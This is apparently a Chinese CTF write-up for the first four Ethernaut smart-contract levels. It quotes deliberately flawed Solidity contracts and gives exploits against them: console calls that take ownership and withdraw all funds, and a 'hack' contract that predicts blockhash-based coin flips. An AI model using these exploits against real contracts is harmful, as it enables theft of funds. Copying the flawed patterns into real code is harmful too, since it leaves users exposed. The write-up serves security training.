[CTF | BlockChain] Ethernaut靶场 WP (更新中)
刚醒,怎么大家都会区块链了啊。这下不得不学了
[Level 1] Hello Ethernaut
比较基础的入门教程
从9给你的提示开始一路往下走就行
如下
然后直接submit即可
[Level 2] Fallback
// SPDX-License-Identifier: MIT
pragma solidity ^0.8.0;
contract Fallback {
mapping(address => uint) public contributions;
address public owner;
constructor() {
owner = msg.sender;
contributions[msg.sender] = 1000 * (1 ether);
}
modifier onlyOwner {
require(
msg.sender == owner,
"caller is not the owner"
);
_;
}
function contribute() public payable {
require(msg.value < 0.001 ether);
contributions[msg.sender] += msg.value;
if(contributions[msg.sender] > contributions[owner]) {
owner = msg.sender;
}
}
function getContribution() public view returns (uint) {
return contributions[msg.sender];
}
function withdraw() public onlyOwner {
payable(owner).transfer(address(this).balance);
}
receive() external payable {
require(msg.value > 0 && contributions[msg.sender] > 0);
owner = msg.sender;
}
}
如名,考的是fallback function,即合约中的receive()。在不调用任何函数直接向合约发起交易的时候,会自动调用本函数。
本题要求
- 成为合约的owner
- 转走合约所有的钱
能让owner = msg.sender的函数只有contribute和receive。但是由于owner贡献了1000eth,你一次又只能贡献0.001eth,contribution想超过owner显然不可能。于是考虑receive函数,需要你转一点eth,同时contributions大于0即可。那思路就很清晰了,首先contribute转1wei,然后再直接给合约转1wei,即可成为owner。成为owner后调用withdraw即可提走所有的钱。
await contract.contribute.sendTransaction({value:1})
await contract.sendTransaction({value:1})
await contract.owner() // 查看当前owner是否为自己
await contract.withdraw() // 提走所有钱
[Level 3] Fallout
// SPDX-License-Identifier: MIT
pragma solidity ^0.6.0;
import 'openzeppelin-contracts-06/math/SafeMath.sol';
contract Fallout {
using SafeMath for uint256;
mapping (address => uint) allocations;
address payable public owner;
/* constructor */
function Fal1out() public payable {
owner = msg.sender;
allocations[owner] = msg.value;
}
modifier onlyOwner {
require(
msg.sender == owner,
"caller is not the owner"
);
_;
}
function allocate() public payable {
allocations[msg.sender] = allocations[msg.sender].add(msg.value);
}
function sendAllocation(address payable allocator) public {
require(allocations[allocator] > 0);
allocator.transfer(allocations[allocator]);
}
function collectAllocations() public onlyOwner {
msg.sender.transfer(address(this).balance);
}
function allocatorBalance(address allocator) public view returns (uint) {
return allocations[allocator];
}
}
这道题其实很简单,给Fal1out转账即可(注意是数字1不是字母l)。
await contract.Fal1out.sendTransaction({value:1})
这道题想表达的其实是合约constructor和合约名字的关系和漏洞。
[Level 4] Coin Flip
pragma solidity ^0.8.0;
contract CoinFlip {
uint256 public consecutiveWins;
uint256 lastHash;
uint256 FACTOR = 57896044618658097711785492504343953926634992332820282019728792003956564819968;
constructor() {
consecutiveWins = 0;
}
function flip(bool _guess) public returns (bool) {
uint256 blockValue = uint256(blockhash(block.number - 1));
if (lastHash == blockValue) {
revert();
}
lastHash = blockValue;
uint256 coinFlip = blockValue / FACTOR;
bool side = coinFlip == 1 ? true : false;
if (side == _guess) {
consecutiveWins++;
return true;
} else {
consecutiveWins = 0;
return false;
}
}
}
block.number是公开通用的,那这里的随机数也不随机了。利用Remix Solidity IDE写一个判断side并调用Coinflip函数的合约即可。部署好后运行10次,让await contract.consecutiveWins()为10即可。
pragma solidity ^0.8.0;
contract CoinFlip {
uint256 public consecutiveWins;
uint256 lastHash;
uint256 FACTOR = 57896044618658097711785492504343953926634992332820282019728792003956564819968;
constructor() {
consecutiveWins = 0;
}
function flip(bool _guess) public returns (bool) {
uint256 blockValue = uint256(blockhash(block.number - 1));
if (lastHash == blockValue) {
revert();
}
lastHash = blockValue;
uint256 coinFlip = blockValue / FACTOR;
bool side = coinFlip == 1 ? true : false;
if (side == _guess) {
consecutiveWins++;
return true;
} else {
consecutiveWins = 0;
return false;
}
}
}
contract hack {
uint256 FACTOR = 57896044618658097711785492504343953926634992332820282019728792003956564819968;
CoinFlip c = CoinFlip(0x1df38aBE66df10C0daAae16f1d4898d127eE0A61);
function exp() public{
uint256 blockValue = uint256(blockhash(block.number - 1));
uint256 coinFlip = blockValue / FACTOR;
bool side = coinFlip == 1 ? true : false;
c.flip(side);
}
}
